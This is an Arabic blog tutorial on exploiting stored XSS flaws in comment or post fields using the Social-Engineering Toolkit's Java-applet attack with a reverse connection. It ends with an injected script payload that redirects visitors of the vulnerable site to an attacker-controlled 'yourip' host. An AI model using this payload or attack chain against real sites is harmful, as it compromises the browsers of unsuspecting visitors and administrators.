-->
recent

آخر الأخبار

recent
جاري التحميل ...

إستغلال ثغرات XSS Stored باستخدام أداة SET

تعتبر ثغرات من اخطر الثغرات الامنية في مجال الاختراق لما تمكن المخترق من القيام بعدة تحكمات واختراقات تخصص اجهزة متصفحة الموقع المصاب وقد يكون المسؤؤل عن الموقع احد هذه الضحايا .في هذه التدوينة سوف نتطرق الى كيفية استغلالها بشكل احترافي واستعمال اداة SETالشهيرة لضمان نجاح استغلال هذا النوع من الثغرات الامنية 

كما نعرف ان هذا النوع من الثغرات يمكن ان تجده في تطبيقات الويب من خلال متلا زر التعليق او اضافة موضوع او غيرها
كما في الصورة التالية


بعد تجريب اذا كانت الثغرة موجودة سواء يدويا او من خلال اداة اختبار اختراق ننتقل الى كيفية استخدام اداةSET لاستغلال هذا النوع 
بطريقة احترافية


بعد تشغيل الاداة والولوج الى لوحة الخيارات المتنوعة كل ما علينا فعله هو

بعد اختبار هذا النوع من الهجوم والذي يستهدف مكون الجافا الموجود في المستعرض لدى المستخدمين نفوم بوضع الايبي الخاص بنا لعمل اتصال عكسي وكذلك استخدام تصميم محدد للعرض

الخطوة الاكثر اهمية هي اختيار البايلود المناسب كما هو موضح في الصورة التالية

بعدها لاتمام الاستغلال كما تريد بالفعل عليك بالذهاب الى مكان اكتشاف الثغرة الامنية وتطبيق البايلود الخاص بذلك
<script>window.location="http://yourip"</script>

بقم : طويري عبدو

بقلم : طويري عبدو

يوتيوبر جزائري و مدون عربي ناشئ يهتم بكل ما هو جديد في عالم التكنلوجيا و التقنية و هدفه الأول هو تصحيح الأفكار و الدروس الخاطئة التي تنشر في الويب .

التعليقات



إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

إتصل بنا

عن الموقع

تغريداتي

جميع الحقوق محفوظة

مدونة عبدو في المعلوماتية

2016